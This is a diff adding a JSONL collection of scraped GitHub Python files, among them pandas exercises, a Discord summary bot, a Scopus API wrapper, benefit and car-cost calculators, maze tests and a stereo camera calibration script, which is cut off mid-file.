diff --git "a/4810.jsonl" "b/4810.jsonl" new file mode 100644--- /dev/null +++ "b/4810.jsonl" @@ -0,0 +1,397 @@ +{"seq_id":"29836091622","text":"#import pandas as dtf\ndtf = \"\"\n#↑jupyterでは上のコメントを外し、pdの変数宣言を消す\nleft = dtf.DataFrame({'name':['aaa','bbb','ccc','ddd'],'age':[24,33,27,42]})\nright = dtf.DataFrame({'name':['eee','bbb','aaa','fff','ddd'],'group':['x','y','y','x','x']}) #表作成\n\nleft\n\ndtf.merge(left,right) #表結合\ndtf.merge(left,right,how='outer') #どちらかの表にしか値が無い場合でも結合させる\ndtf.concat([left,right]) #単純に縦に表結合させる\ndtf.concat([left,right],axis=1) #キーに関係なく横に結合させる\n","repo_name":"zumioo/study_Python","sub_path":"pandas/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"29018691973","text":"from sqlalchemy import create_engine, Column, Integer, String, Table, MetaData, Boolean\n\nfrom util.data.table_helper import TableHelper\n\n\nclass UserData:\n def __init__(self, user_id):\n self.user_id = user_id\n\n engine = create_engine(f'sqlite:///data/user_{self.user_id}.db', echo=False)\n meta = MetaData()\n self.conn = engine.connect()\n\n self.booleans = self.Booleans(meta, self.conn)\n self.playlists = self.Playlists(meta, self.conn)\n self.strings = self.Strings(meta, self.conn)\n\n meta.create_all(engine)\n\n class Booleans(TableHelper):\n def __init__(self, meta, conn):\n self.conn = conn\n\n self.booleans = Table(\n 'booleans', meta,\n Column('id', Integer, primary_key=True),\n Column('name', String, unique=True),\n Column('value', Boolean)\n )\n\n super().__init__(self.booleans, self.conn)\n\n def insert(self, name: str, value: bool):\n self.insert_([{'name': name, 'value': value}])\n\n class Playlists(TableHelper):\n def __init__(self, meta, conn):\n self.conn = conn\n\n self.playlists = Table(\n 'playlists', meta,\n Column('id', Integer, primary_key=True),\n Column('name', String, unique=True),\n Column('value', String)\n )\n\n super().__init__(self.playlists, self.conn)\n\n def insert(self, name: str, value: str):\n self.insert_([{'name': name, 'value': value}])\n\n class Strings(TableHelper):\n def __init__(self, meta, conn):\n self.conn = conn\n\n self.strings = Table(\n 'strings', meta,\n Column('id', Integer, primary_key=True),\n Column('name', String, unique=True),\n Column('value', String)\n )\n\n super().__init__(self.strings, self.conn)\n\n def insert(self, name: str, value: str):\n self.insert_([{'name': name, 'value': value}])\n","repo_name":"MiningMark48/Tidal-Bot","sub_path":"util/data/user_data.py","file_name":"user_data.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"13953723634","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals, division\n\nclass RomanNumeralsConverter(object):\n\n\tromans_dict = {\n\t\t1000 : 'M',\n\t\t900 : 'CM',\n\t\t500 : 'D',\n\t\t400 : 'CD',\n\t\t100 : 'C',\n\t\t90 : 'XC',\n\t\t50 : 'L',\n\t\t40 : 'XL',\n\t\t10 : 'X',\n\t\t9 : 'IX',\n\t\t5 : 'V',\n\t\t4 : 'IV',\n\t\t1 : 'I',\n\t}\n\n\tdef __init__(self):\n\t\tself.result = ''\n\n\tdef convert(self, number):\n\n\t\tkeys = self.romans_dict.keys()\n\t\tKeys = keys.sort(reverse=True)\n\n\t\tfor key in keys:\n\t\t\twhile number >= key:\n\t\t\t\tself.result += self.romans_dict[key]\n\t\t\t\tnumber -= key\n\n\t\treturn self.result","repo_name":"scrubmx/CodeKatas","sub_path":"python/roman_numerals/src/roman_numerals.py","file_name":"roman_numerals.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"22702141687","text":"import argparse\nfrom sklearn import metrics\nfrom pathlib import Path\n\nparser = argparse.ArgumentParser()\nparser.add_argument('file', help='specify the path of the results file')\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n label_true = []\n label_pred = []\n target_names = []\n with Path(args.file).open() as f:\n for line in f:\n tag_name = line.strip().split()[0]\n if tag_name not in target_names:\n target_names.append(tag_name)\n label_true.append(tag_name)\n label_pred.append(line.strip().split()[1])\n print(metrics.classification_report(y_pred=label_pred, y_true=label_true, target_names=['POS', 'NEG']))\n","repo_name":"linguishi/chinese_sentiment","sub_path":"model/score_report.py","file_name":"score_report.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":655,"dataset":"github-code","pt":"86"} +{"seq_id":"14875153592","text":"import discord\nfrom discord.ext import commands\nfrom discord import app_commands\nimport settings\nimport datetime\nfrom modules.modImakita import makeReply\n\nclass ImakitaCog(commands.Cog):\n def __init__(self, bot: commands.Bot):\n super().__init__()\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_ready(self):\n await self.bot.tree.sync(guild=discord.Object(int(settings.getId())))\n print(\"[Cogs] ImakitaCog is ready.\")\n\n @app_commands.command(name=\"imakita\", description=\"指定した時間分の会話を要約します\")\n @app_commands.guilds(int(settings.getId()))\n\n async def imakita(self, interaction: discord.Interaction, hour: int):\n await interaction.response.defer()\n\n end_time = datetime.datetime.now()\n start_time = end_time - datetime.timedelta(hours=hour)\n\n text = []\n async for message in interaction.channel.history(limit=None, after=start_time, before=end_time):\n text.append(f\"{message.author}: {message.content}\")\n\n await interaction.followup.send(embed=makeReply(text,hour))\n \n\nasync def setup(bot: commands.Bot):\n await bot.add_cog(ImakitaCog(bot))","repo_name":"Soli0222/Charmy","sub_path":"cogs/imakita.py","file_name":"imakita.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"9762536846","text":"from matplotlib import pyplot as plt\nimport numpy as np\n\nbas_sek = 1166\nlaginkomst_sek = 180\nlaginkomst_dagar = 90\nhoginkomst_dagar = 390\ntotalt_antal_dagar = 480\nveckor_manad = 4.35\npauline_antal_hoginkomstdagar = [0]\npauline_antal_hoginkomstdagar_manad_for_manad = [0]\npauline_hoginkomst_summering = [0]\npauline_antal_laginkomstdagar = [0]\npauline_laginkomst_summering = [0]\npauline_laginkomst_och_hoginkomst_summering = []\ntom_antal_hoginkomstdagar = [0]\ntom_antal_hoginkomstdagar_manad_for_manad = [0]\ntom_hoginkomst_summering = [0]\ntom_antal_laginkomstdagar = [0]\ntom_laginkomst_summering = [0]\ntom_laginkomst_och_hoginkomst_summering = []\n\ndef lagg_till_dagar_pauline():\n pauline_manader_ledig = int(input(\"Hur många månader ska Pauline vara ledig?\"))\n pauline_antal_dagar_betalt_per_vecka_hoginkomst = int(input(\"Hur många dagar höginkomst ska Pauline ha i veckan?\"))\n pauline_antal_dagar_betalt_per_vecka_laginkomst = int(input(\"Hur många dagar låginkomst ska Pauline ha i veckan?\"))\n \n for _ in range(pauline_manader_ledig):\n pauline_antal_hoginkomstdagar.append(pauline_antal_dagar_betalt_per_vecka_hoginkomst)\n pauline_antal_hoginkomstdagar_manad_for_manad.append(pauline_antal_hoginkomstdagar_manad_for_manad[-1] + pauline_antal_dagar_betalt_per_vecka_hoginkomst)\n pauline_hoginkomst_summering.append(pauline_hoginkomst_summering[-1] + (pauline_antal_dagar_betalt_per_vecka_hoginkomst * veckor_manad * bas_sek))\n pauline_antal_laginkomstdagar.append(pauline_antal_dagar_betalt_per_vecka_laginkomst)\n pauline_laginkomst_summering.append(pauline_laginkomst_summering[-1] + (pauline_antal_dagar_betalt_per_vecka_laginkomst * veckor_manad * laginkomst_sek))\n \n\ndef lagg_till_dagar_tom():\n tom_manader_ledig = int(input(\"Hur många månader ska Tom vara ledig?\"))\n tom_antal_dagar_betalt_per_vecka_hoginkomst = int(input(\"Hur många dagar höginkomst ska Tom ha i veckan?\"))\n tom_antal_dagar_betalt_per_vecka_laginkomst = int(input(\"Hur många dagar låginkomst ska Tom ha i veckan?\"))\n \n for _ in range(tom_manader_ledig):\n tom_antal_hoginkomstdagar.append(tom_antal_dagar_betalt_per_vecka_hoginkomst)\n tom_antal_hoginkomstdagar_manad_for_manad.append(tom_antal_hoginkomstdagar_manad_for_manad[-1] + tom_antal_dagar_betalt_per_vecka_hoginkomst)\n tom_hoginkomst_summering.append(tom_hoginkomst_summering[-1] + (tom_antal_dagar_betalt_per_vecka_hoginkomst * veckor_manad * bas_sek))\n tom_antal_laginkomstdagar.append(tom_antal_dagar_betalt_per_vecka_laginkomst)\n tom_laginkomst_summering.append(tom_laginkomst_summering[-1] + (tom_antal_dagar_betalt_per_vecka_laginkomst * veckor_manad * laginkomst_sek))\n\n\ndef skapa_listor():\n lagg_till_dagar_pauline()\n while True:\n fler_dagar_pauline = str(input(\"Vill du lägga till fler dagar? (y/n)\"))\n if fler_dagar_pauline == ('n' or 'No' or 'no' or 'N' or 'nej'):\n break\n else:\n lagg_till_dagar_pauline()\n \n lagg_till_dagar_tom()\n while True:\n fler_dagar_tom = str(input(\"Vill du lägga till fler dagar? (y/n)\"))\n if fler_dagar_tom == ('n' or 'No' or 'no' or 'N' or 'nej'):\n break\n else:\n lagg_till_dagar_tom()\n \n pauline_laginkomst_och_hoginkomst_summering = np.add(pauline_hoginkomst_summering, pauline_laginkomst_summering)\n tom_laginkomst_och_hoginkomst_summering = np.add(tom_hoginkomst_summering, tom_laginkomst_summering)\n\n #print('1', pauline_antal_hoginkomstdagar)\n #print('2', pauline_antal_hoginkomstdagar_manad_for_manad)\n #print('3', pauline_hoginkomst_summering)\n #print('4', pauline_antal_laginkomstdagar)\n #print('5', pauline_laginkomst_summering)\n #print('6', pauline_laginkomst_och_hoginkomst_summering)\n #print('7', tom_antal_hoginkomstdagar)\n #print('8', tom_hoginkomst_summering)\n #print('9', tom_antal_laginkomstdagar)\n #print('10', tom_laginkomst_summering)\n #print('11', tom_laginkomst_och_hoginkomst_summering)\n\n manader_pauline = []\n for i in range(len(pauline_laginkomst_och_hoginkomst_summering)):\n manader_pauline.append(i)\n \n manader_tom = []\n for i in range(len(tom_laginkomst_och_hoginkomst_summering)):\n manader_tom.append(i)\n \n \n plt.plot(manader_pauline, pauline_laginkomst_och_hoginkomst_summering, label='Pauline')\n plt.plot(manader_tom, tom_laginkomst_och_hoginkomst_summering, label='Tom')\n plt.legend()\n plt.show()\n\n pauline_antal_hoginkomstdagar_totalt = sum(pauline_antal_hoginkomstdagar) * 4.35\n pauline_antal_laginkomstdagar_totalt = sum(pauline_antal_laginkomstdagar) * 4.35\n tom_antal_hoginkomstdagar_totalt = sum(tom_antal_hoginkomstdagar) * 4.35\n tom_antal_laginkomstdagar_totalt = sum(tom_antal_laginkomstdagar) * 4.35\n hoginkomst_dagar_kvar = hoginkomst_dagar - pauline_antal_hoginkomstdagar_totalt - tom_antal_hoginkomstdagar_totalt\n laginkomst_dagar_kvar = laginkomst_dagar - pauline_antal_laginkomstdagar_totalt - tom_antal_laginkomstdagar_totalt\n\n plt.bar('hoginkomstdagar Pauline', pauline_antal_hoginkomstdagar_totalt)\n plt.bar('laginkomstdagar Pauline', pauline_antal_laginkomstdagar_totalt)\n\n plt.bar('hoginkomstdagar Tom', tom_antal_hoginkomstdagar_totalt)\n plt.bar('laginkomstdagar Tom', tom_antal_laginkomstdagar_totalt)\n\n plt.bar('laginkomst dagar kvar', laginkomst_dagar_kvar)\n plt.bar('hoginkomst dagar kvar', hoginkomst_dagar_kvar)\n plt.show()\n\nwhile True:\n skapa_listor()\n quit()\n","repo_name":"TamiAlQuida/TamiAlQuida.github.io","sub_path":"scripts/foraldradagar.py","file_name":"foraldradagar.py","file_ext":"py","file_size_in_byte":5544,"program_lang":"python","lang":"sv","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"37778472643","text":"# import the inputs logic\nfrom inputs import gather_imputs, input_dict\n\n# import the calculation logic\nfrom calculator import calculateMonthlyOwnershipCosts, getRecommendation\n\n# import the outputs logic\nfrom outputs import listsGenerator\n\n# Libraries import\nimport termtables as tt\n\ndef main():\n print(\"Welcome to the Car Affordability Calculator! \\n\" + \"Please kindly enter the following requested information: \")\n while True:\n # Get the inputs from the user\n user_inputs = gather_imputs(input_dict)\n print(\"\\n Thank you \" + user_inputs[\"user_details\"][\"name\"]+ \".\\n\")\n #Calculate based on the inputs and the number of cars to evaluate\n # Initialize the URL for fetching fuel prices\n fuel_price_url = \"https://gasprices.aaa.com/\"\n # Calculate based on the inputs and the number of cars to evaluate\n for i, vehicle in enumerate(user_inputs['vehicle_details']):\n # Extracting details for each vehicle\n v_details = user_inputs['vehicle_details'][i]\n # Calculating the monthly ownership costs for each vehicle\n all_ownership_costs = calculateMonthlyOwnershipCosts(\n yearly_maintenance_cost=v_details['Estimated yearly maintenance cost'],\n yearly_insurance_cost=v_details['Estimated yearly insurance cost'],\n yearly_registration_cost=v_details['Estimated yearly registration cost'],\n yearly_repair_cost=v_details['Estimated yearly repair cost'],\n fuel_type=v_details['fuel type'],\n MPG=v_details['MPG (miles per gallon)'],\n avg_dist_per_weekday=v_details['Average distance driven per weekday'],\n avg_dist_per_weekend=v_details['Average distance driven per weekend'],\n URL=fuel_price_url,\n loan_amount=v_details['Car loan amount'],\n down_payment=v_details['Car loan down payment'],\n annual_interest_rate=v_details['Car loan interest rate'],\n loan_term_years=v_details['Car loan time']\n )\n # Adding the monthly ownership cost to the user_inputs dictionary for each vehicle\n user_inputs['vehicle_details'][i]['monthly_ownership_cost'] = all_ownership_costs\n \n # Print the results\n vehicle_details_table = listsGenerator(user_inputs, \"vehicle_details\")\n vehicle_financial_details_table = listsGenerator(user_inputs, \"financial_details\")\n vehicle_monthly_ownership_costs_table = listsGenerator(user_inputs, \"monthly_costs\")\n \n print(\"The following are the details of the vehicles you entered: \\n\")\n tt.print(vehicle_details_table, style=tt.styles.thin_thick)\n print(\"\\n\")\n print(\"The following are the financial details of the vehicles you entered: \\n\")\n tt.print(vehicle_financial_details_table, style=tt.styles.thin_thick)\n print(\"\\n\")\n print(\"The following are the monthly ownership costs of the vehicles you entered: \\n\")\n tt.print(vehicle_monthly_ownership_costs_table, style=tt.styles.thin_thick)\n print(\"\\n\")\n \n # Recommend the best car based on the monthly ownership costs\n recommendation, table = getRecommendation(user_inputs)\n print(recommendation)\n print(\"\\nDetailed Comparison:\")\n print(table)\n if input(\"Do you want to try again? (Y/N): \").lower() != \"y\":\n print(\"Thank you for using the Car Affordability Calculator!\")\n break\n else:\n print(\"Kindly enter the following requested information: \")\n \nmain()","repo_name":"angelo-oviedo/car-affordabillity-calculator","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"70604080606","text":"import unittest\nfrom maze import Maze\nfrom ds import UnionFind\n\nclass Tests(unittest.TestCase):\n def test_maze_create_cells(self):\n start_x, start_y = 0, 0\n num_rows, num_cols = 15, 10\n cell_size = 10\n window = None\n maze = Maze(start_x, start_y, num_rows, num_cols, cell_size, window)\n\n self.assertEqual(len(maze._cells), num_rows)\n self.assertEqual(len(maze._cells[0]), num_cols)\n\n def test_reset_cells_visited(self):\n start_x, start_y = 0, 0\n num_rows, num_cols = 15, 10\n cell_size = 10\n window = None\n maze = Maze(start_x, start_y, num_rows, num_cols, cell_size, window)\n\n for i in range(maze._row_count):\n for j in range(maze._col_count):\n maze._cells[i][j].visited = True\n\n maze._reset_cells_visited()\n\n all_unvisited = True\n for i in range(maze._row_count):\n for j in range(maze._col_count):\n if maze._cells[i][j].visited:\n all_unvisited = False\n break;\n \n self.assertEqual(all_unvisited, True)\n\n def test_union_find_created_correctly(self):\n size = 10\n uf = UnionFind(size)\n self.assertEqual(uf.size, size)\n self.assertEqual(uf.set_count, size)\n self.assertEqual(len(uf.ids), size)\n self.assertEqual(len(uf.sizes), size)\n \n def test_union_unify_works_correctly(self):\n size = 10\n uf = UnionFind(size)\n p, q, z = 0, size // 2, size - 1\n uf.unify(p, q)\n uf.unify(q, z)\n\n p_set_id, q_set_id, z_set_id = uf.find(p), uf.find(q), uf.find(z)\n p_set_size = uf.get_set_size(p)\n\n self.assertEqual(p_set_id, q_set_id)\n self.assertEqual(p_set_id, z_set_id)\n self.assertEqual(p_set_size, 3)\n \n def test_union_connection_checking_works_correctly(self):\n size = 10\n uf = UnionFind(size)\n p, q, z = 0, size // 2, size - 1\n uf.unify(p, q)\n pq_united = True\n pz_united = False\n qz_united = False\n\n self.assertEqual(uf.check_if_connected(p, q), pq_united)\n self.assertEqual(uf.check_if_connected(p, z), pz_united)\n self.assertEqual(uf.check_if_connected(q, z), qz_united)\n \n\n \n \nif __name__ == \"__main__\":\n unittest.main()\n\n\n","repo_name":"rizvanium/mazesolver","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"42957822796","text":"# -*- coding: utf-8 -*-\n\nimport requests, warnings, os, json\nimport numpy as np\nimport pandas as pd\nfrom datetime import date\nfrom pyscopus import APIURI\nfrom pyscopus.utils import _parse_author, _parse_author_retrieval,\\\n _parse_affiliation, _parse_entry, _parse_citation,\\\n _parse_abstract_retrieval, trunc,\\\n _search_scopus, _parse_serial, _parse_aff\n\nclass Scopus(object):\n '''\n Scopus class.\n For instantiation of scopus objects to retrieve data from scopus.com\n Refer to http://zhiyzuo.github.com/python-scopus for more information\n Let me know if there's any issue with this code.\n\n Happy coding,\n Zhiya\n zhiyazuo@gmail.com\n '''\n\n def __init__(self, apikey=None):\n self.apikey = apikey\n\n def add_key(self, apikey):\n self.apikey = apikey\n\n def search(self, query, count=100, type_=1, view='COMPLETE'):\n '''\n Search for documents matching the keywords in query\n Details: http://api.elsevier.com/documentation/SCOPUSSearchAPI.wadl\n Tips: http://api.elsevier.com/documentation/search/SCOPUSSearchTips.htm\n\n Parameters\n ----------------------------------------------------------------------\n query : str\n Query style (see above websites).\n count : int\n The number of records to be returned.\n view : string\n Returned result view (i.e., return fields). Can only be STANDARD for author search.\n\n Returns\n ----------------------------------------------------------------------\n pandas.DataFrame\n Data frame of search results.\n '''\n\n\n if type(count) is not int:\n raise ValueError(\"%s is not a valid input for the number of entries to return.\" %number)\n\n result_df, total_count = _search_scopus(self.apikey, query, type_, view=view)\n\n if total_count <= count:\n count = total_count\n\n if count <= 25:\n # if less than 25, just one page of response is enough\n return result_df[:count]\n\n # if larger than, go to next few pages until enough\n i = 1\n while True:\n index = 25*i\n result_df = result_df.append(_search_scopus(self.apikey, query, type_, view=view, index=index),\n ignore_index=True)\n if result_df.shape[0] >= count:\n return result_df[:count]\n i += 1\n\n def search_author(self, query, view='STANDARD', count=10):\n '''\n Search for specific authors\n Details: http://api.elsevier.com/documentation/AUTHORSearchAPI.wadl\n Fields: http://api.elsevier.com/content/search/fields/author\n\n Parameters\n ----------------------------------------------------------------------\n query : str\n Query style (see above websites).\n count : int\n The number of records to be returned.\n view : string\n Returned result view (i.e., return fields). Can only be STANDARD for author search.\n\n Returns\n ----------------------------------------------------------------------\n pandas.DataFrame\n Data frame of search results.\n '''\n\n return self.search(query, count, type_=2, view=view)\n\n def search_author_publication(self, author_id, count=10000):\n '''\n Returns a list of document records for an author in the form of pandas.DataFrame.\n\n Search for specific authors' document records in Scopus\n Same thing for search, with search limited to author id\n\n Parameters\n ----------------------------------------------------------------------\n author_id : str\n Author id in Scopus database.\n count : int\n The number of records to return. By default set to 10000 for all docs.\n\n Returns\n ----------------------------------------------------------------------\n pandas.DataFrame\n Data frame of search results.\n '''\n\n query = 'au-id(%s)'%author_id\n return self.search(query, count)\n\n def retrieve_author(self, author_id):\n '''\n Search for specific authors\n Details: http://api.elsevier.com/documentation/AuthorRetrievalAPI.wadl\n\n Parameters\n ----------------------------------------------------------------------\n author_id : str\n Author id in Scopus database.\n\n Returns\n ----------------------------------------------------------------------\n dict\n Dictionary of author information.\n '''\n\n par = {'apikey': self.apikey, 'httpAccept': 'application/json'}\n r = requests.get('%s/%s'%(APIURI.AUTHOR, author_id), params=par)\n\n js = r.json()\n try:\n return _parse_author_retrieval(js)\n except:\n raise ValueError('Author %s not found!' %author_id)\n\n def retrieve_abstract(self, scopus_id, download_path=None, view='FULL'):\n '''\n Retrieve publication abstracts\n Details: https://api.elsevier.com/documentation/AbstractRetrievalAPI.wadl\n\n Parameters\n ----------------------------------------------------------------------\n scopus_id : str\n Scopus id of a publication in Scopus database.\n download_path : str\n Where to save JSON response for this abstract retreival result. Default is None (do not save)\n view : str\n Options: BASIC, META, META_ABS, REF, FULL (default)\n\n\n Returns\n ----------------------------------------------------------------------\n dict\n Dictionary of publication id, title, and abstract.\n '''\n\n par = {'apikey': self.apikey, 'httpAccept': 'application/json', 'view': view}\n r = requests.get('%s/%s'%(APIURI.ABSTRACT, scopus_id), params=par)\n\n js = r.json()\n\n if download_path is not None:\n if not os.path.exists(download_path):\n os.mkdir(download_path)\n if not download_path.endswith('/'):\n download_path += '/'\n json.dump(js, open(download_path+scopus_id+'.json', 'w'))\n\n try:\n return _parse_abstract_retrieval(js)\n except:\n raise ValueError('Abstract for %s not found!' %scopus_id)\n\n def retrieve_citation(self, scopus_id_array, year_range):\n '''\n Retrieve citation counts\n Details: https://api.elsevier.com/documentation/AbstractCitationAPI.wadl\n\n Parameters\n ----------------------------------------------------------------------\n scopus_id_array : array (list, tuple or np.array)\n Scopus id of a publication in Scopus database.\n\n year_range : array (list, tuple or np.array) of length 2\n 1st element is the start year; 2nd element is the end year. Both integers.\n\n Returns\n ----------------------------------------------------------------------\n pandas DataFrame\n Data frame of citation counts over time.\n '''\n\n date = '%i-%i' %(year_range[0], year_range[1])\n\n par = {'apikey': self.apikey, 'scopus_id': ','.join(scopus_id_array), \\\n 'httpAccept':'application/json', 'date': date}\n\n r = requests.get(APIURI.CITATION, params=par)\n js = r.json()\n\n return _parse_citation(js, year_range)\n\n def retrieve_full_text(self, full_text_link):\n r = requests.get(full_text_link, params={'apikey': self.apikey,\n 'httpAccept': 'application/json'}\n )\n return r.json()['full-text-retrieval-response']['originalText']\n\n def search_serial(self, title, view='CITESCORE', count=200):\n '''\n Search serial title metadata\n Details: https://dev.elsevier.com/documentation/SerialTitleAPI.wadl\n\n Parameters\n ----------\n title : str\n Title to be searched in the database\n view : str\n Options: STANDARD, ENHANCED, CITESCORE (default), COVERIMAGE\n count : int\n Max number of results to be returned (200 by default)\n\n Returns\n -------\n 3 pandas DataFrames:\n - first one is the meta information\n - second one is the temporal citescore in each year\n - last one is the temporal rank/percentile for each subject code in each year\n If cite score is not avaiable then the last two are empty\n '''\n if type(count) != int or count > 200:\n warnings.warn(\"count corrected to be 200\", UserWarning)\n count = 200\n if view not in ['STANDARD', 'ENHANCED', 'CITESCORE']:\n warnings.warn(\"view corrected to be CITESCORE\", UserWarning)\n view = 'CITESCORE'\n par = {'apiKey': self.apikey, 'title': title,\n 'count': count, 'view': view}\n r = requests.get(APIURI.SERIAL_SEARCH, par)\n return _parse_serial(r.json())\n\n def retrieve_serial(self, issn, view='CITESCORE'):\n '''\n Retrieve serial title metadata, given issn\n Details: https://dev.elsevier.com/documentation/SerialTitleAPI.wadl\n\n Parameters\n ----------\n issn : str\n ISSN of the serial\n view : str\n Options: STANDARD, ENHANCED, CITESCORE (default), COVERIMAGE\n\n Returns\n -------\n 3 pandas DataFrames:\n - first one is the meta information\n - second one is the temporal citescore in each year\n - last one is the temporal rank/percentile for each subject code in each year\n If cite score is not avaiable then the last two are empty\n '''\n\n if view not in ['STANDARD', 'ENHANCED', 'CITESCORE']:\n warnings.warn(\"view corrected to be CITESCORE\", UserWarning)\n view = 'CITESCORE'\n par = {'apiKey': self.apikey, 'view': view}\n\n r = requests.get(APIURI.SERIAL_RETRIEVAL+issn,\n params=par)\n return _parse_serial(r.json())\n\n def retrieve_affiliation(self, aff_id, view='STANDARD'):\n '''\n Retrieve affiliation profile, given id\n Details: https://dev.elsevier.com/documentation/AffiliationRetrievalAPI.wadl\n\n Parameters\n ----------\n aff_id : str\n affiliation_id\n view : str\n Options: STANDARD (default), LIGHT, BASIC\n\n Returns\n -------\n '''\n\n par = {'apiKey': self.apikey, 'view': view, 'httpAccept': 'application/json'}\n\n r = requests.get(APIURI.AFFL_RETRIEVAL+aff_id,\n params=par)\n d = _parse_aff(r.json()['affiliation-retrieval-response'])\n d['aff_id'] = aff_id\n return d\n","repo_name":"zhiyzuo/python-scopus","sub_path":"pyscopus/scopus.py","file_name":"scopus.py","file_ext":"py","file_size_in_byte":11304,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"86"} +{"seq_id":"44430586979","text":"import numpy as np\nimport cv2\nimport camera\nimport time\nimport sys\nimport glob\nimport os\nimport random\n\ncam_setting = {\"width\":1280,\"height\":720,\"frame_rate\":23,\"shutter\":0,\"iso\":800}\n# capture imgs or do calibration\n# \"shoot\" or \"calibrate\"\nstatus = sys.argv[1]\n# maximum samples numbers used for calculation\nMAX_IMAGES = int(sys.argv[2])\n# save path for left and right image pair\nL_path = '/home/pi/Desktop/PyCharm/L_cali'\nR_path = '/home/pi/Desktop/PyCharm/R_cali'\n\n\n# calibrate single camera\ndef Find_chessboard_single(img_path):\n CHESSBOARD_SIZE = (9, 6)\n OBJECT_POINT_ZERO = np.zeros((CHESSBOARD_SIZE[0] * CHESSBOARD_SIZE[1], 3),\n np.float32)\n OBJECT_POINT_ZERO[:, :2] = np.mgrid[0:CHESSBOARD_SIZE[0],\n 0:CHESSBOARD_SIZE[1]].T.reshape(-1, 2)\n\n\n TERMINATION_CRITERIA = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_MAX_ITER, 30,\n 0.001)\n\n filenames = []\n objectPoints = []\n imagePoints = []\n imageSize = None\n cacheFile = \"{0}/chessboards.npz\".format(img_path)\n try:\n cache = np.load(cacheFile)\n print(\"Loading image data from cache file at {0}\".format(cacheFile))\n return (list(cache[\"filenames\"]), list(cache[\"objectPoints\"]),\n list(cache[\"imagePoints\"]), tuple(cache[\"imageSize\"]))\n except IOError:\n print(\"Cache file at {0} not found\".format(cacheFile))\n\n\n print(\"Reading images at {0}\".format(img_path))\n imagePaths = glob.glob(\"{0}/*.jpg\".format(img_path))\n\n for imagePath in sorted(imagePaths):\n image = cv2.imread(imagePath)\n grayImage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n newSize = grayImage.shape[::-1]\n if imageSize != None and newSize != imageSize:\n raise ValueError(\n \"Calibration image at {0} is not the same size as the others\"\n .format(imagePath))\n imageSize = newSize\n\n hasCorners, corners = cv2.findChessboardCorners(grayImage,\n CHESSBOARD_SIZE, cv2.CALIB_CB_FAST_CHECK)\n\n if hasCorners:\n filenames.append(os.path.basename(imagePath))\n objectPoints.append(OBJECT_POINT_ZERO)\n cv2.cornerSubPix(grayImage, corners, (11, 11), (-1, -1),\n TERMINATION_CRITERIA)\n imagePoints.append(corners)\n\n cv2.drawChessboardCorners(image, CHESSBOARD_SIZE, corners, hasCorners)\n cv2.imshow(img_path, image)\n cv2.waitKey(100)\n\n cv2.destroyWindow(img_path)\n\n print(\"Found corners in {0} out of {1} images\"\n .format(len(imagePoints), len(imagePaths)))\n\n\n np.savez_compressed(cacheFile,\n filenames=filenames, objectPoints=objectPoints,\n imagePoints=imagePoints, imageSize=imageSize)\n\n return filenames, objectPoints, imagePoints, imageSize\n\n\n# extract require obj, img points\ndef Get_require_points(requestedFilenames,allFilenames, objectPoints, imagePoints):\n\n requestedFilenameSet = set(requestedFilenames)\n requestedObjectPoints = []\n requestedImagePoints = []\n\n for index, filename in enumerate(allFilenames):\n if filename in requestedFilenameSet:\n requestedObjectPoints.append(objectPoints[index])\n requestedImagePoints.append(imagePoints[index])\n\n return requestedObjectPoints, requestedImagePoints\n\n\n# test single camera calibration\ndef Test_calibration(mtx,dist,files):\n print(\"Reading images at {0}\".format(files))\n imagePaths = glob.glob(\"{0}/*.jpg\".format(files))\n\n for filename in sorted(imagePaths):\n img = cv2.imread(filename)\n # refine camera matrix\n h, w = img.shape[:2]\n newcameramtx, roi = cv2.getOptimalNewCameraMatrix(mtx, dist, (w, h), 0, (w, h))\n\n # undistort\n dst = cv2.undistort(img, mtx, dist, None, newcameramtx)\n\n # crop the image\n # x, y, w, h = roi\n # dst = dst[y:y + h, x:x + w]\n cv2.imshow(\"original\",img)\n cv2.imshow('calibresult', dst)\n\n cv2.waitKey(50)\n\n cv2.destroyAllWindows()\n\n\ndef main():\n if status == \"shoot\":\n frameId = 1\n while True:\n cam_EYE = 'L'\n cam_ON = camera.Open(\"PI\", cam_EYE)\n cam_ON = camera.Setup(cam_ON, cam_setting, \"PI\")\n # capture image\n # time.sleep(0.1)\n img_L = camera.Capture(cam_ON, \"PI\")\n # img_L = cv2.flip(img_L, -1)\n cam_ON.close()\n\n cam_EYE = 'R'\n cam_ON = camera.Open(\"PI\", cam_EYE)\n cam_ON = camera.Setup(cam_ON, cam_setting, \"PI\")\n # capture image\n # time.sleep(0.1)\n img_R = camera.Capture(cam_ON, \"PI\")\n # img_R = cv2.flip(img_R, -1)\n cam_ON.close()\n\n gray_L = cv2.cvtColor(img_L, cv2.COLOR_BGR2GRAY)\n gray_R = cv2.cvtColor(img_R, cv2.COLOR_BGR2GRAY)\n\n height, width = gray_L.shape[:2]\n gray_L_s = cv2.resize(gray_L,(int(0.5 * width),int(0.5 * height)),interpolation=cv2.INTER_CUBIC)\n gray_R_s = cv2.resize(gray_R, (int(0.5 * width),int(0.5 * height)), interpolation=cv2.INTER_CUBIC)\n cv2.imshow('L_cam', gray_L_s)\n 